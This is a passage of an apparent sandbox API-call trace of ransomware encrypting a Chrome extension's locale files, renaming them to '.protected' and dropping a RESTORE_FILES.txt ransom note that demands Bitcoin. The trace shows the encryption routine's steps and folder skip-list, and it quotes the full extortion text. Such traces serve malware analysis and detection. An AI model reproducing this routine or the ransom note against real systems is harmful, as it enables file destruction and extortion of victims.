Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json") returned 155 [0080.347] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json") returned 155 [0080.347] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.348] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xa7, lpOverlapped=0x0) returned 1 [0080.349] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff59, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.349] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xa7, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xa7, lpOverlapped=0x0) returned 1 [0080.349] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.349] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.349] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.349] CloseHandle (hObject=0x168) returned 1 [0080.349] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.protected") returned 165 [0080.349] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.protected")) returned 1 [0080.350] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.350] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.350] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\RESTORE_FILES.txt") returned 159 [0080.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.351] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.351] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.352] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.352] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.352] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.352] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.352] CloseHandle (hObject=0x164) returned 1 [0080.352] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.352] lstrcmpiW (lpString1="bg", lpString2="Windows") returned -1 [0080.352] lstrcmpiW (lpString1="bg", lpString2="Program Files") returned -1 [0080.352] lstrcmpiW (lpString1="bg", lpString2="Program Files (x86)") returned -1 [0080.352] lstrcmpiW (lpString1="bg", lpString2="$Recycle.bin") returned 1 [0080.352] lstrcmpiW (lpString1="bg", lpString2="System Volume Information") returned -1 [0080.352] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg") returned 141 [0080.352] lstrcmpW (lpString1="bg", lpString2=".") returned 1 [0080.352] lstrcmpW (lpString1="bg", lpString2="..") returned 1 [0080.352] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\*") returned 143 [0080.353] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.354] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.354] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.354] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.354] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.354] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.354] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\.") returned 143 [0080.354] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.354] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.354] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.354] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.354] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.354] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.354] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.354] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\..") returned 144 [0080.354] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.354] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.354] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.354] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.354] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.354] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.354] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.354] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.354] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json") returned 155 [0080.354] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.354] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.354] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.354] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json") returned 155 [0080.355] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json") returned 155 [0080.355] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json") returned 155 [0080.355] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.355] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x114, lpOverlapped=0x0) returned 1 [0080.356] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.356] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x114, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x114, lpOverlapped=0x0) returned 1 [0080.357] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.357] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.357] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.357] CloseHandle (hObject=0x168) returned 1 [0080.357] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.protected") returned 165 [0080.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.protected")) returned 1 [0080.358] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.358] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.358] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\RESTORE_FILES.txt") returned 159 [0080.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.359] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.359] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.360] lstrlenA (lpString="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") returned 684 [0080.360] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.360] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.360] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.360] CloseHandle (hObject=0x164) returned 1 [0080.360] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.360] lstrcmpiW (lpString1="bn", lpString2="Windows") returned -1 [0080.360] lstrcmpiW (lpString1="bn", lpString2="Program Files") returned -1 [0080.360] lstrcmpiW (lpString1="bn", lpString2="Program Files (x86)") returned -1 [0080.360] lstrcmpiW (lpString1="bn", lpString2="$Recycle.bin") returned 1 [0080.360] lstrcmpiW (lpString1="bn", lpString2="System Volume Information") returned -1 [0080.360] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn") returned 141 [0080.360] lstrcmpW (lpString1="bn", lpString2=".") returned 1 [0080.360] lstrcmpW (lpString1="bn", lpString2="..") returned 1 [0080.360] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\*") returned 143 [0080.360] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.361] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.361] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.361] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.361] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.361] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.361] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\.") returned 143 [0080.361] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.361] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.361] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.361] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.361] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.361] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.361] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.361] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\..") returned 144 [0080.361] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.361] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.361] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.361] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.361] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.361] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.361] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.361] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.361] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json") 
returned 155 [0080.361] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.362] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.362] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.362] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json") returned 155 [0080.362] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json") returned 155 [0080.362] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json") returned 155 [0080.362] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.362] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
